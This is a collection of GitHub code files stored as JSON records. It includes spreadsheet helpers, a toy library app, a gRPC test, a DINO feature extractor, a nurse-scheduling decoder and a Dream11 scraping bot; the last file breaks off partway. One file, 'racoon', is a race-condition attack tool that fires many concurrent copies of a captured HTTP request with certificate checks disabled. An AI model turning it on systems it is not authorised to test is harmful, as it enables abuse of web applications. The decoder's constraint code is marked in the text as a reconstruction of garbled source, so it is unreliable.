+{"seq_id":"10210188777","text":"import logging\nfrom typing import List\n\nimport gspread\nimport pandas as pd\nfrom gspread_dataframe import set_with_dataframe\n\nfrom ranking_table_tennis.configs import ConfigManager\n\nlogger = logging.getLogger(__name__)\n\n\ndef upload_sheet_from_df(\n spreadsheet_id: str,\n sheet_name: str,\n df: pd.DataFrame,\n headers: List[str] = None,\n include_index: bool = False,\n include_df_headers: bool = True,\n) -> None:\n \"\"\"\n Saves headers and df data into given sheet_name in spreadsheet_id.\n If sheet_name does not exist, it will be created.\n\n :param include_index: will upload DataFrame index as the first column. It is False by default.\n :param include_df_headers: will upload DataFrame column names as the first row.\n It is True by default.\n :param headers: This list will replace df column names and must have the same length.\n If headers are given, include_df_headers is turned to True.\n \"\"\"\n logger.info(\"< Saving '%s' @ '%s'\", sheet_name, spreadsheet_id)\n try:\n worksheet = _get_ws_from_spreadsheet(sheet_name, spreadsheet_id)\n\n df_headers = df.copy()\n if include_index:\n df_headers.reset_index(inplace=True)\n if headers:\n df_headers.columns = headers\n include_df_headers = True\n\n set_with_dataframe(\n worksheet,\n df_headers,\n resize=True, # include_index=include_index,\n include_column_header=include_df_headers,\n )\n\n except ConnectionError:\n logger.warn(\"!! FAILED to upload '%s' @ '%s'\", sheet_name, spreadsheet_id)\n\n\ndef load_and_upload_sheet(filename: str, sheet_name: str, spreadsheet_id: str) -> None:\n df = pd.read_excel(filename, sheet_name, index_col=None, header=None, na_filter=False)\n upload_sheet_from_df(spreadsheet_id, sheet_name, df, include_df_headers=False) # index is pid\n\n\ndef create_n_tour_sheet(spreadsheet_id: str, tid: str) -> None:\n \"\"\"\n Create sheet corresponding to n_tour tournament by duplication of the first-tournament sheet.\n A new sheet is created in given spreadsheet_id as follows:\n 1- first-tournament sheet is duplicated\n 2- Two replacements are performed in the new sheet, considering n_tour.\n For example, if n_tour=4, value of A1 cell and sheet title will change\n 'Tournament 01'->'Tournament 04'\n :param spreadsheet_id: spreadsheet where duplication will be performed\n :param tid: tournament to create\n :return: None\n \"\"\"\n cfg = ConfigManager().current_config\n first_key = f\"{cfg.labels.Tournament} 01\"\n replacement_key = f\"{cfg.labels.Tournament} {tid[-2:]}\"\n\n try:\n gc = _get_gc()\n wb = gc.open_by_key(spreadsheet_id)\n sheetname_listed = [ws.title for ws in wb.worksheets() if first_key in ws.title]\n if sheetname_listed:\n sheetname = sheetname_listed[0]\n new_sheetname = sheetname.replace(first_key, replacement_key)\n if new_sheetname in [ws.title for ws in wb.worksheets()]:\n out_ws = wb.worksheet(new_sheetname)\n wb.del_worksheet(out_ws)\n ws = wb.worksheet(sheetname)\n dup_ws = wb.duplicate_sheet(ws.id, new_sheet_name=new_sheetname)\n dup_cell_value = dup_ws.acell(\"A1\", value_render_option=\"FORMULA\").value\n dup_ws.update_acell(\"A1\", dup_cell_value.replace(first_key, replacement_key))\n logger.info(\n \"> Creating '%s' @ '%s' from '%s'\", new_sheetname, spreadsheet_id, sheetname\n )\n else:\n logger.warn(\"!! FAIL TO DUPLICATE: '%s' does not exist @ '%s'\", first_key, spreadsheet_id)\n\n except ConnectionError:\n logger.warn(\"!! Connection Error. 
FAIL TO DUPLICATE '%s' @ '%s'\", first_key, spreadsheet_id)\n\n\ndef publish_to_web(tid: str, show_on_web=False) -> None:\n if show_on_web:\n cfg = ConfigManager().current_config\n for spreadsheet_id in cfg.io.published_on_web_spreadsheets_id:\n create_n_tour_sheet(spreadsheet_id, tid)\n\n\ndef _in_colab() -> bool:\n # Verify if it is running on colab\n try:\n import google.colab # noqa\n\n _in_colab = True\n except ModuleNotFoundError:\n _in_colab = False\n\n return _in_colab\n\n\ndef _get_gc() -> gspread.Client:\n try:\n if _in_colab():\n from google.colab import auth\n\n auth.authenticate_user()\n from oauth2client.client import GoogleCredentials # type: ignore\n\n gc = gspread.authorize(GoogleCredentials.get_application_default())\n else:\n gc = gspread.oauth()\n except FileNotFoundError:\n logger.warn(\"!! The .json key file has not been configured. Upload will fail.\")\n raise ConnectionError\n # except OSError:\n # logger.warn(\"!!Connection failure. Upload will fail.\")\n\n return gc\n\n\ndef _get_ws_from_spreadsheet(sheet_name: str, spreadsheet_id: str):\n gc = _get_gc()\n wb = gc.open_by_key(spreadsheet_id)\n if sheet_name not in [ws.title for ws in wb.worksheets()]:\n wb.add_worksheet(sheet_name, rows=1, cols=1)\n ws = wb.worksheet(sheet_name)\n\n return ws\n","repo_name":"srvanrell/ranking-table-tennis","sub_path":"ranking_table_tennis/helpers/gspread.py","file_name":"gspread.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
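# A pandas-only sketch of the header-replacement step inside upload_sheet_from_df()
# above; no Google credentials are needed, and the frame/headers are invented:
import pandas as pd

df = pd.DataFrame({"player": ["ana", "bea"], "points": [10, 7]})
headers = ["Jugador", "Puntos"]  # must match the column count, as the docstring says

df_headers = df.copy()
df_headers.columns = headers  # exactly what the helper does before uploading
print(df_headers)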
+{"seq_id":"15512095556","text":"\r\nclass Library:\r\n \r\n def __init__(self, list_of_books) -> None:\r\n self.available_books = list_of_books\r\n \r\n # to display all the available books\r\n def display_available_books(self):\r\n for books in self.available_books:\r\n print(f'Available Books are: {books}')\r\n \r\n def lend_book(self, requested_book):\r\n if requested_book in self.available_books:\r\n print(f'You have now borrowed the book {requested_book}')\r\n self.available_books.remove(requested_book)\r\n \r\n # elif book_count is 2 and requested_book in self.available_books:\r\n # print(f'You have now borrowed the {book_count} books name {requested_book}')\r\n # self.available_books.remove(requested_book) \r\n \r\n else:\r\n print('Sorry, the book is not available in the book list') \r\n \r\n def add_book(self, returned_book):\r\n # if no_of_book is 1:\r\n # self.available_books.append(returned_book)\r\n # elif no_of_book is 2:\r\n self.available_books.append(returned_book)\r\n \r\n \r\nclass Customer:\r\n \r\n def request_books(self):\r\n #borrow_book_count = 0\r\n #print('Enter the how many book you wanna borrow, limitation is 2')\r\n #book_want = int(input())\r\n #if book_want is 1:\r\n print('Enter the name of the book you would like to borrow:')\r\n self.book = input() # though book name is string\r\n #borrow_book_count += 1\r\n return self.book\r\n # elif book_want is 2:\r\n # print('Enter the name of the books you would like to borrow:')\r\n # # though book name is string\r\n # self.books = input().split(',')\r\n # borrow_book_count += book_want \r\n # return self.books, borrow_book_count\r\n \r\n \r\n def return_book(self):\r\n #book_returned = int(input('Enter the no. of books wanna returned: '))\r\n #if book_returned is 1:\r\n print('Enter the name of the book which you are returning:')\r\n self.book = input()\r\n return self.book\r\n # elif book_returned is 2:\r\n # print('Enter the name of the book which you are returning:')\r\n # self.books = input().split(',')\r\n # return self.books\r\n \r\n\r\nbook_list = ['Time Management', 'Grow Enrich', 'C++ Paradigm', 'For One More Day']\r\nlibrary = Library(book_list)\r\ncustomer = Customer()\r\n\r\nwhile True:\r\n print('Enter 1 to display the available books')\r\n print('Enter 2 to request a book or books')\r\n print('Enter 3 to return a book or books')\r\n print('Enter 4 to exit')\r\n \r\n user_choice = int(input('Enter the choice: '))\r\n \r\n if user_choice == 1:\r\n library.display_available_books()\r\n \r\n elif user_choice == 2:\r\n requested_book = customer.request_books()\r\n library.lend_book(requested_book)\r\n \r\n elif user_choice == 3:\r\n returned_book = customer.return_book()\r\n library.add_book(returned_book)\r\n \r\n elif user_choice == 4:\r\n print('Exiting...')\r\n exit()","repo_name":"JaberKh16/Python-Fundamentals-Concept-Practices","sub_path":"Section-17 Python Object Oriented Programming/7.Encapsulation or Data Hiding/17.7.7 Library Example On Encapsulation.py","file_name":"17.7.7 Library Example On Encapsulation.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"110599998","text":" \nimport unittest\nimport grpc\nimport sys\nimport time\nfrom delayedassert import expect, expect_equal, assert_expectations\nimport logging\nimport os\n\nimport MexController as mex_controller\n\ncontroller_address = os.getenv('AUTOMATION_CONTROLLER_ADDRESS', '127.0.0.1:55001')\n\nmex_root_cert = 'mex-ca.crt'\nmex_cert = 'mex-client.crt'\nmex_key = 'mex-client.key'\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\nclass tc(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n stamp = str(time.time())\n self.cluster_name = 'cluster' + stamp\n self.operator_name = 'dmuus'\n self.cloud_name = 'tmocloud-1'\n self.flavor_name = 'c1.small' + stamp\n self.developer_name = 'developer' + stamp\n\n# self.operator = mex_controller.Operator(operator_name = self.operator_name) \n self.cloudlet = mex_controller.Cloudlet(cloudlet_name = self.cloud_name,\n operator_org_name = self.operator_name,\n number_of_dynamic_ips = 254)\n self.flavor = mex_controller.Flavor(flavor_name=self.flavor_name, ram=1024, vcpus=1, disk=1)\n self.controller = mex_controller.MexController(controller_address = controller_address,\n# root_cert = mex_root_cert,\n# key = mex_key,\n# client_cert = mex_cert\n )\n #self.cluster = mex_controller.Cluster(cluster_name=cluster_name,\n # default_flavor_name=flavor_name)\n\n self.cluster_instance = mex_controller.ClusterInstance(cluster_name=self.cluster_name,\n cloudlet_name=self.cloud_name,\n operator_org_name=self.operator_name,\n developer_org_name=self.developer_name,\n flavor_name=self.flavor_name)\n\n self.controller.create_flavor(self.flavor.flavor)\n #self.controller.create_operator(self.operator.operator)\n #self.controller.create_cloudlet(self.cloudlet.cloudlet)\n\n def test_CreateClusterTwice(self):\n # [Documentation] ClusterInst - User shall not be able to create the same cluster instance twice\n # ... create the same cluster twice\n # ... 
verify error of 'Key already exists' is returned\n\n # print the existing cluster instances\n clusterinst_pre = self.controller.show_cluster_instances()\n\n # create a new cluster and cluster instance\n #create_cluster_resp = self.controller.create_cluster(self.cluster.cluster)\n self.controller.create_cluster_instance(self.cluster_instance.cluster_instance)\n #time.sleep(1)\n\n # create the cluster instance which already exists\n try:\n resp = self.controller.create_cluster_instance(self.cluster_instance.cluster_instance)\n except:\n print('create cluster instance failed')\n # print the cluster instances after error\n clusterinst_post = self.controller.show_cluster_instances()\n\n expect_equal(self.controller.response.code(), grpc.StatusCode.UNKNOWN, 'status code')\n expect_equal(self.controller.response.details(), 'ClusterInst key {\"cluster_key\":{\"name\":\"' + self.cluster_name + '\"},\"cloudlet_key\":{\"organization\":\"' + self.operator_name + '\",\"name\":\"' + self.cloud_name + '\"},\"organization\":\"' + self.developer_name + '\"} already exists', 'error details')\n expect_equal(len(clusterinst_pre)+1, len(clusterinst_post), 'number of cluster instances')\n assert_expectations()\n\n def tearDown(self):\n self.controller.delete_cluster_instance(self.cluster_instance.cluster_instance)\n #self.controller.delete_cluster(self.cluster.cluster)\n self.controller.delete_flavor(self.flavor.flavor)\n #self.controller.delete_cloudlet(self.cloudlet.cloudlet)\n #self.controller.delete_operator(self.operator.operator)\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(tc)\n sys.exit(not unittest.TextTestRunner().run(suite).wasSuccessful())\n\n","repo_name":"mobiledgex/edge-cloud-qa","sub_path":"testcases/controller/cluster/test_clusterInstAdd_keyExists.py","file_name":"test_clusterInstAdd_keyExists.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8323936571","text":"import re, sys, requests, threading, argparse\nimport concurrent.futures\nfrom agent import Agent\n\nrequests.packages.urllib3.disable_warnings()\n\ndef getInfo(inp, a):\n fr = open(inp, 'r')\n it = 0\n nowdata = False\n for line in fr:\n if (it == 0):\n a.setMethod(line)\n a.setUrl(line)\n a.setParam(line)\n elif (line != '\\n' and (not nowdata)):\n a.setHeaders(line)\n elif (line == '\\n'):\n nowdata = True\n elif (nowdata):\n a.setData(line)\n it+=1\n\ndef sendPost(i, u, x, y, z):\n r = requests.post(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendPut(i, u, x, y, z):\n r = requests.put(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendGet(i, u, x, y, z):\n r = requests.get(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendPatch(i, u, x, y, z):\n r = requests.patch(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendReq(a, w, h):\n u = h + '://' + a.url\n param = a.param\n data = a.data\n headers = a.headers\n if (a.method == 'POST'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendPost, i, u, headers, param, data)\n elif (a.method == 'PUT'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendPut, i, u, headers, param, data)\n elif (a.method == 'GET'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendGet, i, u, headers, param, data)\n elif (a.method == 'PATCH'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendPatch, i, u, headers, param, data)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='racoon - race condition automation')\n parser.add_argument('-t', '--target', type=str, help='target config file')\n parser.add_argument('--https', help='use https. default: no', action='store_true')\n parser.add_argument('-w', '--worker', type=int, help='how many workers run at a time')\n args = parser.parse_args()\n\n if(not args.target or not args.worker):\n parser.print_help()\n sys.exit(1)\n\n print('Starting '+str(args.worker)+' threads to test '+args.target+'...')\n a = Agent()\n getInfo(args.target, a)\n sendReq(a, args.worker, 'https') if args.https else sendReq(a, args.worker, 'http')","repo_name":"fachrioktavian/racoon","sub_path":"racoon.py","file_name":"racoon.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
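# A self-contained sketch of the burst pattern sendReq() above relies on: submit N
# identical requests to a thread pool so they land nearly simultaneously (the URL is
# illustrative only, not part of the tool):
import concurrent.futures

import requests

def fire(i, url):
    r = requests.get(url, timeout=10)
    print(f"thread-{i}> {r.status_code}")

workers = 5
with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:
    for i in range(workers):
        executor.submit(fire, i, "https://httpbin.org/get")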
+{"seq_id":"43093908166","text":"import os\nimport sys\nimport pickle\nimport argparse\n\nimport torch\nfrom torch import nn\nimport torch.distributed as dist\nimport torch.backends.cudnn as cudnn\nfrom torchvision import models as torchvision_models\nfrom torchvision import transforms as pth_transforms\nfrom torchvision import datasets\nfrom PIL import Image, ImageFile\nimport numpy as np\nimport pandas as pd\n\nimport utils\nimport vision_transformer as vits\n\n\ndef extract_dino_features(model, data_loader, use_cuda=True, multiscale=False, return_csv=False, save_path = \"Features/\"):\n metric_logger = utils.MetricLogger(delimiter=\" \")\n features = []\n i = 0; all_samples = []; all_labels = []; \n for samples, index in metric_logger.log_every(data_loader, 10):\n if use_cuda: \n samples = samples.cuda(non_blocking=True)\n index = index.cuda(non_blocking=True)\n \n #-----\n sample_fname, sample_class = data_loader.dataset.samples[i]; i += 1\n pos_fname = str.rfind(sample_fname, \"/\")\n sample_fname = sample_fname[pos_fname+1:] \n all_samples.append(sample_fname)\n all_labels.append(sample_class)\n #print (sample_fname) #csv_name\n #-----\n \n if multiscale:\n feats = utils.multi_scale(samples, model)\n else:\n feats = model(samples).clone()\n \n if not features:\n print(f\"Storing features into tensor of shape [{len(data_loader.dataset)}, {feats.shape[-1]}]\")\n \n if use_cuda: \n features.extend(feats.cpu().detach().numpy().reshape([1,-1]))\n else: \n features.extend(feats.detach().numpy())\n \n if return_csv == True: \n return np.array(features), all_samples, all_labels\n else:\n return np.array(features)\n\n\ndef main(): \n parser = argparse.ArgumentParser('Image Retrieval on revisited Paris and Oxford')\n parser.add_argument('--data_path', default='/path/to/revisited_paris_oxford/', type=str)\n parser.add_argument('--dataset', default='roxford5k', type=str, choices=['roxford5k', 'rparis6k'])\n parser.add_argument('--multiscale', default=False, type=utils.bool_flag)\n parser.add_argument('--imsize', default=224, type=int, help='Image size')\n parser.add_argument('--pretrained_weights', default='', type=str, help=\"Path to pretrained weights to evaluate.\")\n parser.add_argument('--train_data_path', default='', type=str, help=\"Path to train samples.\")\n parser.add_argument('--test_data_path', default=None, type=str, help=\"Path to test samples.\")\n parser.add_argument('--output_dir', default='', type=str, help=\"Path to save extracted features.\")\n parser.add_argument('--use_cuda', default=True, type=utils.bool_flag)\n parser.add_argument('--gpu', default=0, type=int, help='GPU to use')\n parser.add_argument('--arch', default='vit_small', type=str, help='Architecture')\n parser.add_argument('--patch_size', default=16, type=int, help='Patch resolution of the model.')\n parser.add_argument(\"--checkpoint_key\", default=\"teacher\", type=str,\n help='Key to use in the checkpoint (example: \"teacher\")')\n parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.')\n parser.add_argument(\"--dist_url\", default=\"env://\", type=str, help=\"\"\"url used to set up\n distributed training; see https://pytorch.org/docs/stable/distributed.html\"\"\")\n parser.add_argument(\"--local_rank\", default=0, type=int, help=\"Please ignore and do not set this argument.\")\n parser.add_argument(\"--num-channels\", default=3, type=int, help=\"\"\"Number of input channels\"\"\")\n parser.add_argument(\"--port\", default='29500', type=str, help=\"\"\"port for 
parallelization\"\"\")\n args = parser.parse_args()\n\n utils.init_distributed_mode(args)\n print(\"git:\\n {}\\n\".format(utils.get_sha()))\n print(\"\\n\".join(\"%s: %s\" % (k, str(v)) for k, v in sorted(dict(vars(args)).items())))\n cudnn.benchmark = True\n\n # ============ preparing data ... ============\n if args.num_channels == 3: \n transform = pth_transforms.Compose([\n pth_transforms.ToTensor(),\n pth_transforms.Resize(args.imsize, pth_transforms.InterpolationMode.BICUBIC),\n pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n #pth_transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)),\n ])\n else: \n transform = pth_transforms.Compose([\n pth_transforms.ToTensor(),\n pth_transforms.Resize(args.imsize, pth_transforms.InterpolationMode.BICUBIC),\n pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n pth_transforms.Grayscale(1),\n ])\n \n dataset_train = datasets.ImageFolder(args.train_data_path, transform=transform)\n sampler = torch.utils.data.DistributedSampler(dataset_train, shuffle=False)\n data_loader_train = torch.utils.data.DataLoader(\n dataset_train,\n sampler=sampler,\n batch_size=1,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False,\n )\n \n if args.test_data_path: \n dataset_query = datasets.ImageFolder(args.test_data_path, transform=transform)\n \n if args.test_data_path: \n data_loader_query = torch.utils.data.DataLoader(\n dataset_query,\n batch_size=1,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False,\n )\n \n print(f\"train: {len(dataset_train)} imgs\") \n if args.test_data_path: \n print(f\"query: {len(dataset_query)} imgs\")\n \n \n # ============ building network ... ============\n if \"vit\" in args.arch:\n model = vits.__dict__[args.arch](patch_size=args.patch_size, num_channels=args.num_channels, num_classes=0)\n print(f\"Model {args.arch} {args.patch_size}x{args.patch_size} built.\")\n elif \"xcit\" in args.arch:\n model = torch.hub.load('facebookresearch/xcit:main', args.arch, num_classes=0)\n elif args.arch in torchvision_models.__dict__.keys():\n model = torchvision_models.__dict__[args.arch](num_classes=0)\n else:\n print(f\"Architecture {args.arch} non supported\")\n sys.exit(1)\n if args.use_cuda:\n model.cuda()\n model.eval()\n\n # load pretrained weights\n if os.path.isfile(args.pretrained_weights):\n state_dict = torch.load(args.pretrained_weights, map_location=\"cpu\")\n if args.checkpoint_key is not None and args.checkpoint_key in state_dict:\n print(f\"Take key {args.checkpoint_key} in provided checkpoint dict\")\n state_dict = state_dict[args.checkpoint_key]\n # remove `module.` prefix\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n # remove `backbone.train_names` prefix induced by multicrop wrapper\n state_dict = {k.replace(\"backbone.\", \"\"): v for k, v in state_dict.items()}\n msg = model.load_state_dict(state_dict, strict=False)\n print('Pretrained weights found at {} and loaded with msg: {}'.format(args.pretrained_weights, msg))\n elif args.arch == \"vit_small\" and args.patch_size == 16:\n print(\"Since no pretrained weights have been provided, we load pretrained DINO weights on Google Landmark v2.\")\n model.load_state_dict(torch.hub.load_state_dict_from_url(url=\"https://dl.fbaipublicfiles.com/dino/dino_vitsmall16_googlelandmark_pretrain/dino_vitsmall16_googlelandmark_pretrain.pth\"))\n else:\n print(\"Warning: We use random weights.\")\n\n ############################################################################\n \n 
os.makedirs(args.output_dir, exist_ok = True)\n \n # Step 1: extract features\n train_features, train_names, train_labels = extract_dino_features(model, data_loader_train, args.use_cuda, multiscale=args.multiscale, return_csv = True, save_path = args.output_dir + \"train/\")\n #train_features = nn.functional.normalize(train_features, dim=1, p=2)\n \n csv_dict = {\"namefile\": train_names, \"label\": train_labels}\n csv_dict = pd.DataFrame.from_dict(csv_dict)\n csv_dict.to_csv(args.output_dir + \"train_features.csv\", index = False)\n np.save (args.output_dir + \"train_features.npy\", train_features)\n \n \n if args.test_data_path: \n query_features, query_names, query_labels = extract_dino_features(model, data_loader_query, args.use_cuda, multiscale=args.multiscale, return_csv = True, save_path = args.output_dir + \"test/\")\n #query_features = nn.functional.normalize(query_features, dim=1, p=2)\n np.save (args.output_dir + \"test_features.npy\", query_features)\n \n csv_dict = {\"namefile\": query_names, \"label\": query_labels}\n csv_dict = pd.DataFrame.from_dict(csv_dict)\n csv_dict.to_csv(args.output_dir + \"test_features.csv\", index = False)\n \n\nif __name__ == '__main__':\n \"\"\"\n param = sys.argv.append\n param (\"--arch\"); param(\"vit_small\"); param (\"--imsize\"); param(\"256\"); \n param (\"--gpu\"); param(\"5\"); param (\"--multiscale\"); param(\"0\"); \n param (\"--train_data_path\"); param (\"Data/he_data/he_7k/\"); \n #param (\"--test_data_path\"); param(\"Data/he_data/CRC-VAL-HE-7K-CONT/\"); \n param (\"--pretrained_weights\"); param(\"/scr/rfonnegr/sources/pretrains/dino/checkpoint.pth\") #param(\"/scr/rfonnegr/sources/pretrains/dino/dino_cells.pth\");\n param (\"--output_dir\"); param(\"Features/he_7k_jc/\"); \n param (\"--num-channels\"); param(\"3\"); \n \"\"\"\n main()","repo_name":"rubenfonnegra/dino_cvd","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
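# A small numpy-only sketch of what the saved features enable: cosine-similarity
# retrieval. Random vectors stand in for train_features.npy / test_features.npy;
# 384 matches the ViT-S embedding width used by the default --arch:
import numpy as np

train = np.random.rand(100, 384).astype(np.float32)
query = np.random.rand(5, 384).astype(np.float32)

train /= np.linalg.norm(train, axis=1, keepdims=True)  # L2-normalise so the dot
query /= np.linalg.norm(query, axis=1, keepdims=True)  # product is cosine similarity

sims = query @ train.T                     # (5, 100) similarity matrix
topk = np.argsort(-sims, axis=1)[:, :10]   # indices of the 10 closest train images
print(topk.shape)                          # (5, 10)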
+{"seq_id":"69967717522","text":"import numpy as np\nimport math, sys\n\ndef getChromosomeLength(data):\n return int(data[\"numNurses\"])*24\n\ndef decode(population, data):\n for ind in population:\n solution, fitness=decoder_assignment(data,ind['chr'])\n ind['solution']=solution\n ind['fitness']=fitness\n return(population)\n\n\n\ndef test(data,working):\n\n Demand=list(map(float,data[\"Demand\"][:]))\n numNurses=int(data[\"numNurses\"])\n minHours=int(data[\"minHours\"])\n maxHours=int(data[\"maxHours\"])\n maxConsec=int(data[\"maxConsec\"])\n maxPresence=int(data[\"maxPresence\"])\n\n #--------------------------------- Number of nurses working\n used=[0]*numNurses\n\n #--------------------------------- Demand\n flagDemand=True\n\n for i in range(24):\n somme=0\n for j in range(numNurses):\n somme+=working[j][i]\n\n if (somme!=Demand[i]):\n flagDemand=False\n\n #--------------------------------- minHours & maxHours\n flagminHours=True\n flagmaxHours=True\n\n for i in range(numNurses):\n somme=0\n for j in range(24):\n somme+=working[i][j]\n\n if (somme>0):\n used[i]=1\n\n if ((used[i]==1) & (somme<=minHours)):\n flagminHours=False\n\n if (somme>maxHours):\n flagmaxHours=False\n\n # NOTE: the maxConsec/maxPresence/resting checks were garbled in this dump (the\n # text between '<' and '>' was stripped); the blocks below are a reconstruction\n # from the constraint names used in Flag, not the original source.\n #--------------------------------- maxConsec\n flagmaxConsec=True\n\n for i in range(numNurses):\n consec=0\n for j in range(24):\n if (working[i][j]==1):\n consec+=1\n if (consec>maxConsec):\n flagmaxConsec=False\n else:\n consec=0\n\n #--------------------------------- maxPresence & resting\n flagmaxPresence=True\n flagmaxResting=True\n\n for i in range(numNurses):\n if (used[i]==1):\n if (Last(i,working)-First(i,working)+1>maxPresence):\n flagmaxPresence=False\n\n resting=0\n for j in range(First(i,working),Last(i,working)+1):\n if (working[i][j]==0):\n resting+=1\n if (resting>=2):\n flagmaxResting=False\n else:\n resting=0\n\n\n\n Flag=((flagDemand) & (flagminHours) & (flagmaxHours) & (flagmaxConsec) & (flagmaxPresence) & (flagmaxResting))\n\n\n return used, Flag\n\n\n\ndef First(n,working):\n first=0\n while (working[n][first]==0):\n first+=1\n return first\n\n\ndef Last(n,working):\n last=23\n while (working[n][last]==0):\n last-=1\n return last\n\n\n\n\n\n\n\ndef decoder_assignment(data,chromosome):\n\n \n numNurses=int(data[\"numNurses\"])\n\n\n working=np.zeros((numNurses,24))\n solution=[None]*(getChromosomeLength(data))\n\n\n for i in range(getChromosomeLength(data)):\n\n n=i//24\n h=i%24\n\n if chromosome[i]>=0.5:\n working[n][h]=1\n else:\n working[n][h]=0\n \n solution[i]=working[n][h]\n\n \n #CONSTRAINTS\n used,Flag=test(data,working)\n \n \n if (Flag):\n fitness=sum(used)\n else:\n fitness=99999999\n\n\n\n\n return solution, fitness\n\n","repo_name":"EmelineGOT/FIB","sub_path":"AMMM/BRKGA/DECODER_assignment.py","file_name":"DECODER_assignment.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
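# A toy run of the decoding rule in decoder_assignment() above (values >= 0.5 map to
# a working hour), shown with numpy on an invented 2-nurse / 4-hour instance:
import numpy as np

chromosome = [0.9, 0.1, 0.6, 0.2,   # nurse 0
              0.4, 0.7, 0.8, 0.1]   # nurse 1
working = (np.array(chromosome).reshape(2, 4) >= 0.5).astype(int)
print(working)
# [[1 0 1 0]
#  [0 1 1 0]]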
+{"seq_id":"22526394129","text":"import argparse\nimport operator\nfrom collections import OrderedDict\nimport time\nimport traceback\nfrom base64 import b64decode\nfrom copy import deepcopy\nfrom selenium.common.exceptions import WebDriverException\nfrom utils.config import Config\nfrom utils.get_logger import Logger\nfrom utils.utils import save_to_csv\nfrom utils.config import ConfigParser\n\nconfig = ConfigParser()\nconfig.optionxform = str\n\n\nclass Dream11(object):\n def __init__(self):\n self.driver = None\n self.obj = Config()\n self.logger = Logger.get_console_logger()\n self.file_logger = Logger.get_file_logger()\n\n def get_data(self, driver_name='phantom', filename='players.txt', sortby=1):\n try:\n with open(filename, 'w') as f:\n f.truncate()\n players_bat = dict()\n players_wk = dict()\n players_bowl = dict()\n players_ar = dict()\n self.file_logger.info(\n \"********************************************************************************\")\n self.driver = self.obj.get_driver_instance(driver_name)\n if driver_name == 'chrome':\n try:\n time.sleep(5)\n self.driver.switch_to_window(self.driver.window_handles[1])\n if self.driver.current_url == \\\n 'chrome-extension://cfhdojbkjhnklbpkdaibdccddilifddb/firstRun.html':\n # Closing Adblock tab\n self.driver.execute_script('window.close();')\n self.driver.switch_to_window(self.driver.window_handles[0])\n except IndexError:\n pass\n self.logger.info(\"Initialized driver...\")\n self.logger.info(\"Navigating to dream11 homepage...\")\n self.driver.get(self.obj.get_xpath(\"Target_URL\"))\n self.logger.info(\"Entering username\")\n self.obj.send_keys(self.driver, self.obj.get_xpath(\"Username_input\"),\n self.obj.get_xpath(\n \"Username\"))\n self.logger.info(\"Entering password\")\n self.obj.send_keys(self.driver, self.obj.get_xpath(\"Password_input\"), b64decode(\n self.obj.get_xpath(\"Password\")))\n self.logger.info(\"Clicking on login\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Login_btn\"))\n time.sleep(10)\n try:\n self.logger.info(\"Selecting match\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Match_selector\"))\n time.sleep(3)\n self.logger.info(\"Clicking on Create Team\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Create_team_btn\"))\n time.sleep(5)\n # Getting Bats info\n self.logger.info(\"Clicking on BAT tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Bat_tab_link\"))\n self.logger.info(\"Getting Batsmen info...\")\n total_bats = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_batsmens\"))\n for each_ele in total_bats:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_bat[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n # Getting Bowls info\n self.logger.info(\"Clicking on BOWL tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Bowl_tab_link\"))\n self.logger.info(\"Getting Bowlers info...\")\n total_bowls = self.obj.wait_for_elements(self.driver, 